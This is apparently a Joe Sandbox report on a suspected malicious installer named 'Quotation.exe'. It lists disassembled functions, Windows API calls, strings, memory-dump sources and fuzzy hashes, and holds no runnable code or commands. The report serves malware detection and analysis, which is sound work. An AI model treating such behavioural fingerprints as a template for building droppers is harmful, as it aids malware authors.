Function 0040362D Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040364B
MulDiv.KERNEL32(00120E18,00000064,00120E18), ref: 00403673
wsprintfW.USER32 ref: 00403683
SetWindowTextW.USER32(?,?), ref: 00403693
SetDlgItemTextW.USER32(?,00000406,?), ref: 004036A5

Strings

verifying installer: %d%%, xrefs: 0040367D

Memory Dump Source

Source File: 00000000.00000002.2182338365.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182315630.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182367467.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182914211.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 047d2cc0e248829387beeb5a8e07bbe74402e6ee51346e78a70c3337b09d8a04
Instruction ID: 44471e5cb11ab05bb0c6ce4c76b363bdac3f6882ce80e8a3b6daee8e8afc751d
Opcode Fuzzy Hash: 047d2cc0e248829387beeb5a8e07bbe74402e6ee51346e78a70c3337b09d8a04
Instruction Fuzzy Hash: BE018F71540208BBDF20AF60DE45BAA3B28A700305F00803AF642B51E0DBB58554CF4C

Function 6FC92209 Relevance: 9.1, APIs: 6, Instructions: 101COMMON

Download Yara Rule

APIs

Part of subcall function 6FC912F8: GlobalAlloc.KERNELBASE(00000040,?,6FC911C4,-000000A0), ref: 6FC91302

GlobalFree.KERNEL32(00000000), ref: 6FC922F1
GlobalFree.KERNEL32(00000000), ref: 6FC92326

Memory Dump Source

Source File: 00000000.00000002.2232243133.000000006FC91000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FC90000, based on PE: true

Associated: 00000000.00000002.2232047523.000000006FC90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2232324372.000000006FC94000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2232716705.000000006FC96000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fc90000_Quotation.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 9ff0a0b644e801a74f2504a4b58926495d834a0dd0b375756bfa124e04c5653e
Instruction ID: dbc06670d752a22c8d98ac3283ff13d29cc3682e502f6c5dc3e39b118518fafe
Opcode Fuzzy Hash: 9ff0a0b644e801a74f2504a4b58926495d834a0dd0b375756bfa124e04c5653e
Instruction Fuzzy Hash: 92315731108A02DFDB258F68C965FAAB7B8FF87736B00466DF581C6190F73294A4CB60

Function 6FC910C7 Relevance: 8.9, APIs: 7, Instructions: 162memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 6FC9116B
GlobalFree.KERNEL32(00000000), ref: 6FC911AE
GlobalFree.KERNEL32(00000000), ref: 6FC911CD
GlobalAlloc.KERNEL32(00000040,?), ref: 6FC911E6
GlobalFree.KERNEL32 ref: 6FC9125C
GlobalFree.KERNEL32(?), ref: 6FC912A7
GlobalFree.KERNEL32(00000000), ref: 6FC912BF

Memory Dump Source

Source File: 00000000.00000002.2232243133.000000006FC91000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FC90000, based on PE: true

Associated: 00000000.00000002.2232047523.000000006FC90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2232324372.000000006FC94000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2232716705.000000006FC96000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fc90000_Quotation.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: accf520bd453ef553af362d4dd241fc09a54919ae5a80fa71729ccbf95a71fe5
Instruction ID: fadfac7af0e435a7a97efcacfd7efde3100ce19d5aadbb39712ed15c2a7f6d1b
Opcode Fuzzy Hash: accf520bd453ef553af362d4dd241fc09a54919ae5a80fa71729ccbf95a71fe5
Instruction Fuzzy Hash: 6151BF715047029BCB10DF6DC982A6A77FCFF4A325B00492AFA55D7690F736EA10CB90

Function 6FC91F7B Relevance: 7.5, APIs: 5, Instructions: 38memorylibraryloaderCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000808,00000000,6FC92B4C,00000000,00000808), ref: 6FC91F8C
GlobalAlloc.KERNEL32(00000040,00000000), ref: 6FC91F97
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6FC91FAB
GetProcAddress.KERNEL32(?,00000000), ref: 6FC91FB6
GlobalFree.KERNEL32(00000000), ref: 6FC91FBF

Memory Dump Source

Source File: 00000000.00000002.2232243133.000000006FC91000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FC90000, based on PE: true

Associated: 00000000.00000002.2232047523.000000006FC90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2232324372.000000006FC94000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2232716705.000000006FC96000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fc90000_Quotation.jbxd

Similarity

API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
String ID:
API String ID: 1148316912-0
Opcode ID: 177b783d4604d068be3bdc4e2725d0e023f720e30af36320ab34309122459f06
Instruction ID: d43d1f802d46c5f00b5dbeff933ed43c9bad3772dab322cbefb918b43bf74da4
Opcode Fuzzy Hash: 177b783d4604d068be3bdc4e2725d0e023f720e30af36320ab34309122459f06
Instruction Fuzzy Hash: 8DF0C032109519BBCA101AE7DC0CD57BE7DFB8B6FAB165215F729D11A0C56368208771

Function 6FC91F1E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28stringCOMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 6FC91F51
lstrcpyW.KERNEL32(?,error,00001018,6FC91765,00000000,?), ref: 6FC91F71

Strings

callback%d, xrefs: 6FC91F4B
error, xrefs: 6FC91F67, 6FC91F6F

Memory Dump Source

Source File: 00000000.00000002.2232243133.000000006FC91000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FC90000, based on PE: true

Associated: 00000000.00000002.2232047523.000000006FC90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2232324372.000000006FC94000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2232716705.000000006FC96000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fc90000_Quotation.jbxd

Similarity

API ID: lstrcpywsprintf
String ID: callback%d$error
API String ID: 2408954437-1307476583
Opcode ID: 4b3461b5add8e7e48964069057990a56bd61875fcf968929e6be9891cd76b757
Instruction ID: 5835994bd23d6fdd22cd935255a1e319f199ad16309453feabbe58acd9b83055
Opcode Fuzzy Hash: 4b3461b5add8e7e48964069057990a56bd61875fcf968929e6be9891cd76b757
Instruction Fuzzy Hash: 72F08C34208114AFD7088B08D949DBA73A9FF8A310F05C1A8F9698B201E770EC508B91

Function 00406534 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403CA1,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004039A0), ref: 0040653A
CharPrevW.USER32(?,00000000), ref: 00406545
lstrcatW.KERNEL32(?,004082B0), ref: 00406557

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00406534

Memory Dump Source

Source File: 00000000.00000002.2182338365.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182315630.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182367467.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182914211.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3081826266
Opcode ID: d05188d841616a9e1b7d59f18f8490afccaafd82e288364c4b54bb9922993767
Instruction ID: 997ea4b4438496dccce44eacbb2634370b3c3ae0899ac86cf6792f2d8b8f87b4
Opcode Fuzzy Hash: d05188d841616a9e1b7d59f18f8490afccaafd82e288364c4b54bb9922993767
Instruction Fuzzy Hash: F7D05E31102924AFC2026B58AE08D9B77ACEF46341341406EFAC1B3160CB745D5287ED

Function 6FC91CC7 Relevance: 6.2, APIs: 4, Instructions: 209COMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00000000), ref: 6FC91D37
GlobalFree.KERNEL32(?), ref: 6FC91DF2
GlobalFree.KERNEL32(00000000), ref: 6FC91DF5
__alldvrm.LIBCMT ref: 6FC91E2F

Memory Dump Source

Source File: 00000000.00000002.2232243133.000000006FC91000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FC90000, based on PE: true

Associated: 00000000.00000002.2232047523.000000006FC90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2232324372.000000006FC94000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2232716705.000000006FC96000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fc90000_Quotation.jbxd

Similarity

API ID: FreeGlobal$__alldvrm
String ID:
API String ID: 482422042-0
Opcode ID: 86721ad0eacd0f4f1e9d4df48d3b8b271d962408084c95f77df80c3676fa77be
Instruction ID: aae11547d956bdb7e226df95c6c470576956c291c8c4909fe05a841be740ec3a
Opcode Fuzzy Hash: 86721ad0eacd0f4f1e9d4df48d3b8b271d962408084c95f77df80c3676fa77be
Instruction Fuzzy Hash: CC512C337483058FA30A9E7E8A8757A76FDBFCA314B105A2EF155C7290F7A1E9848251

Function 00403367 Relevance: 6.0, APIs: 4, Instructions: 28COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 00403378
GetTickCount.KERNEL32 ref: 00403397
CreateDialogParamW.USER32(0000006F,00000000,0040362D,00000000), ref: 004033B6
ShowWindow.USER32(00000000,00000005), ref: 004033C4

Memory Dump Source

Source File: 00000000.00000002.2182338365.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182315630.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182367467.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182914211.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 357b023d8aff776a3d5515b2d6cdf3b091415c345a00606534bd97e45556d1c1
Instruction ID: 5fb2c38a213eff1d2f515c73fe307429b33afba48c29838db2cc379488067e45
Opcode Fuzzy Hash: 357b023d8aff776a3d5515b2d6cdf3b091415c345a00606534bd97e45556d1c1
Instruction Fuzzy Hash: C9F0F870551700EBDB209F60EF8EB163AA8B740B02F505579F941B51F0DB788514CA5C

Function 00405842 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 00405852

Part of subcall function 004054C6: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004054D8

OleUninitialize.OLE32(00000404,00000000), ref: 0040589E

Part of subcall function 00401399: MulDiv.KERNEL32(?,00007530,00000000), ref: 004013F9
Part of subcall function 00401399: SendMessageW.USER32(?,00000402,00000000), ref: 00401409

Strings

Propoma Setup: Installing, xrefs: 00405842

Memory Dump Source

Source File: 00000000.00000002.2182338365.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182315630.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182367467.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182914211.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: MessageSend$InitializeUninitialize
String ID: Propoma Setup: Installing
API String ID: 1011633862-2385142604
Opcode ID: fae861af5de1a05301b375e788940b7af21e1eb504ad4c379f9acf3cdad0321b
Instruction ID: 8d413f420cbd2cda170a8e13f5886ccfc68e5e1a5fc2061566676394b2cd1e54
Opcode Fuzzy Hash: fae861af5de1a05301b375e788940b7af21e1eb504ad4c379f9acf3cdad0321b
Instruction Fuzzy Hash: 97F09077800A008EE3416B54AD01B6777A4EBD1305F09C53EEE88A62A1DB794C628A5E

Analysis Process: Quotation.exePID: 8048, Parent PID: 7620COMMON

Execution Graph

Execution Coverage:	10.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	86
Total number of Limit Nodes:	9

Executed Functions

Function 3B143108 Relevance: 8.0, Strings: 6, Instructions: 545
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$dq, xrefs: 3B143813
$dq, xrefs: 3B143807
$dq, xrefs: 3B14382B
$dq, xrefs: 3B1437EA
$dq, xrefs: 3B143837
$dq, xrefs: 3B1437DE

Memory Dump Source

Source File: 00000004.00000002.2952343183.000000003B140000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3b140000_Quotation.jbxd

Similarity

API ID:
String ID: $dq$$dq$$dq$$dq$$dq$$dq
API String ID: 0-2331353128
Opcode ID: f87cbfc2806e7381b2d778777f718211e5f6edf2dc3ad8fb97b7bc4711bdd78a
Instruction ID: e96cecba94ac1611b4de62c77ca7a2efe62eabf3c56af1791009af5991c7bc56
Opcode Fuzzy Hash: f87cbfc2806e7381b2d778777f718211e5f6edf2dc3ad8fb97b7bc4711bdd78a
Instruction Fuzzy Hash: 9E324D34E1075A8BCB14EF74C95059DF7B2FFC9300F61966AD449A7264EF30AA85CB80

Function 3B140040 Relevance: 4.6, Strings: 2, Instructions: 2054COMMON

Download Yara Rule

Strings

^7, xrefs: 3B140082
v7, xrefs: 3B141017

Memory Dump Source

Source File: 00000004.00000002.2952343183.000000003B140000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3b140000_Quotation.jbxd

Similarity

API ID:
String ID: ^7$v7
API String ID: 0-454529223
Opcode ID: 74231d76da97956c72cedc323860c697c68dc128fb4319a174d09a355956ef4b
Instruction ID: 80a770c95afbc7dd4808504d7fab11d5495e914094904aab7bc59c0283680c75
Opcode Fuzzy Hash: 74231d76da97956c72cedc323860c697c68dc128fb4319a174d09a355956ef4b
Instruction Fuzzy Hash: 6C230931D10B198EDB11EF68C89469DF7B1FF99300F15D69AE448B7221EB70AAC5CB81

Function 3B147E20 Relevance: 3.0, Strings: 2, Instructions: 471
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$dq, xrefs: 3B14815D
$dq, xrefs: 3B148169

Memory Dump Source

Source File: 00000004.00000002.2952343183.000000003B140000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3b140000_Quotation.jbxd

Similarity

API ID:
String ID: $dq$$dq
API String ID: 0-2340669324
Opcode ID: ca9816a6bb79df4491bb6c95652cfc9480a1b39fd139fb82510c5ee1440b4781
Instruction ID: 2955e345c2ab26a65d69539a7c4a33ec82bd5ed603e58aafb1b3438387af839f
Opcode Fuzzy Hash: ca9816a6bb79df4491bb6c95652cfc9480a1b39fd139fb82510c5ee1440b4781
Instruction Fuzzy Hash: A9029E34B002199FEB04DF68D950A9EB7F2FF89751F148929D809AB395DB71ED42CB80

Function 0016A960 Relevance: 2.9, Instructions: 2900COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2924301679.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4f213e51b8fb70a850a2c4d0833414e6852fbca01696309cb6c7329fe6f8869
Instruction ID: 808330b82a9b200a2f163c3433d32a5e3d4ee5ff740d15e4576d04a50d1c6db2
Opcode Fuzzy Hash: f4f213e51b8fb70a850a2c4d0833414e6852fbca01696309cb6c7329fe6f8869
Instruction Fuzzy Hash: 0A63F831D10B1A8EDB11EB68C8845A9F7B1FF99300F51D79AE458B7121EB70AAD4CF81

Function 0016E289 Relevance: 2.8, Strings: 2, Instructions: 335
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Xhq, xrefs: 0016E39F
$dq, xrefs: 0016E386

Memory Dump Source

Source File: 00000004.00000002.2924301679.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Quotation.jbxd

Similarity

API ID:
String ID: Xhq$$dq
API String ID: 0-4001282582
Opcode ID: 1f40947606bda4811e5b316c488ee0828d676ca629738a22d6cd3175623fffeb
Instruction ID: e04db2b55fc5cc3a84773bc0ea38059bba54ca88e671b46308f6b57407fcf181
Opcode Fuzzy Hash: 1f40947606bda4811e5b316c488ee0828d676ca629738a22d6cd3175623fffeb
Instruction Fuzzy Hash: F1B18F74B042189BDB1CAB79985527E7BA7BFC8700F15862ED406EB384DF38DC129792

Function 0016B3B4 Relevance: 2.3, Instructions: 2336COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2924301679.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92c1612e42972f5d53fd31c115969ae9639f208f84235f4c283a507d7f4271a4
Instruction ID: 5ae28b6b3325f43ceac50ee253bea0eca90532ce43aafddf6336fd93286cb47d
Opcode Fuzzy Hash: 92c1612e42972f5d53fd31c115969ae9639f208f84235f4c283a507d7f4271a4
Instruction Fuzzy Hash: 6543D731D10B1A8ADB11EF68C8846A9F7B1FF99300F51D79AE45877121EB70AAD4CF81

Function 3B145648 Relevance: 1.8, Strings: 1, Instructions: 597COMMON

Download Yara Rule

Strings

$, xrefs: 3B145D54

Memory Dump Source

Source File: 00000004.00000002.2952343183.000000003B140000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3b140000_Quotation.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-3993045852
Opcode ID: cbd38d3a8002fcb8811d4044f8b9bd756c390a7de07542f839ecccba75a77a35
Instruction ID: 23ebcdbc408140f824955d482b5159c5728e9b90230faf0c9a544db46a784ec7
Opcode Fuzzy Hash: cbd38d3a8002fcb8811d4044f8b9bd756c390a7de07542f839ecccba75a77a35
Instruction Fuzzy Hash: 2022B375E002158FEB10DFA4C58069EBBB2FF89361F20846AD845AB399DF35DD42CB90

Function 3B142338 Relevance: 1.1, Instructions: 1060COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2952343183.000000003B140000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3b140000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41ead16169119cd9938e622a72be4de9086418d93a85ef46494f4867298dfb1c
Instruction ID: 3cc83516157057d1c58ba9c057c8229e686bc72eba420e4d77291399f074a9cf
Opcode Fuzzy Hash: 41ead16169119cd9938e622a72be4de9086418d93a85ef46494f4867298dfb1c
Instruction Fuzzy Hash: 90A23638E102088FEB10DB68C584B99F7F2FB49315F5585A9D809AB361DB75ED86CF80

Function 3B146698 Relevance: .8, Instructions: 832COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2952343183.000000003B140000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3b140000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8dc14d166d84ac4dda6aab707c528ea620f3a211115d2a13d399d4270f1952e8
Instruction ID: fcd1ee2f623dee63622e86ad0cb62a3f81f9036269b26868427414f4db62f3fb
Opcode Fuzzy Hash: 8dc14d166d84ac4dda6aab707c528ea620f3a211115d2a13d399d4270f1952e8
Instruction Fuzzy Hash: 4F62B134B102059FEB04DB68C550A9DB7F2FF89359F2485A9E809EB395DB35EC46CB80

Function 3B14C220 Relevance: .6, Instructions: 646COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2952343183.000000003B140000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3b140000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e032ee4cf3b0a973484c56f328c712911ffafa1515a8be47e8bcf5b4866bc52b
Instruction ID: d4a85de1b59a883c7dd8349f23fa044a1ac7ae028e2bcfa5bce80e076d0f9474
Opcode Fuzzy Hash: e032ee4cf3b0a973484c56f328c712911ffafa1515a8be47e8bcf5b4866bc52b
Instruction Fuzzy Hash: FE328234F002199FEB04DB68C990B9EB7B2FB89751F108525E809EB395DB35ED42CB91

Function 3B14B2BA Relevance: .6, Instructions: 568COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2952343183.000000003B140000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3b140000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa638217bead83394c1df508f44162f626a5d1aa553a7396b892ecba9f740f5b
Instruction ID: 3de9343d891032265caca903e50280b3eba484830fbf4acfd2af1931f62d909a
Opcode Fuzzy Hash: aa638217bead83394c1df508f44162f626a5d1aa553a7396b892ecba9f740f5b
Instruction Fuzzy Hash: F0227178E002099BEB10CB68C49079FB7F2EB49752F648925E409EB395DB34DD82DB91

Function 00164A98 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2924301679.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a08a3b5fa2616a2ef0997414a7699d0fb1983e3f23bd2042bd8d8ad968cced49
Instruction ID: 5a6c203f0c3a86e366c37bec9176bedaccc65c2606919286fe98b7e948359bef
Opcode Fuzzy Hash: a08a3b5fa2616a2ef0997414a7699d0fb1983e3f23bd2042bd8d8ad968cced49
Instruction Fuzzy Hash: 0EB16C70E002098FDF14CFA9DC917ADBBF2AF98314F248529D815E7394EB749895CB81

Function 00163E80 Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2924301679.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab8254e80aef19aa63fd9890c5d8a68fcb7e4a5a90e59645f78a513ca7ee9164
Instruction ID: c76d78664f6edf4044089a5194d37286c6b223bdcbff1b7dca6a0454b4fc4557
Opcode Fuzzy Hash: ab8254e80aef19aa63fd9890c5d8a68fcb7e4a5a90e59645f78a513ca7ee9164
Instruction Fuzzy Hash: 11917C70E00209DFDF14CFA9DD857EEBBF2AF98304F148129E415A7294EB749996CB81

Function 3B14AD60 Relevance: 12.9, Strings: 10, Instructions: 393
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$dq, xrefs: 3B14AE81
XM, xrefs: 3B14B1EC
$dq, xrefs: 3B14AE8D
$dq, xrefs: 3B14AEE0
$dq, xrefs: 3B14AED4
$dq, xrefs: 3B14AF2C
$dq, xrefs: 3B14AF38
$dq, xrefs: 3B14AF0F
$dq, xrefs: 3B14AF03
XM, xrefs: 3B14B10B

Memory Dump Source

Source File: 00000004.00000002.2952343183.000000003B140000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3b140000_Quotation.jbxd

Similarity

API ID:
String ID: XM$XM$$dq$$dq$$dq$$dq$$dq$$dq$$dq$$dq
API String ID: 0-3565439727
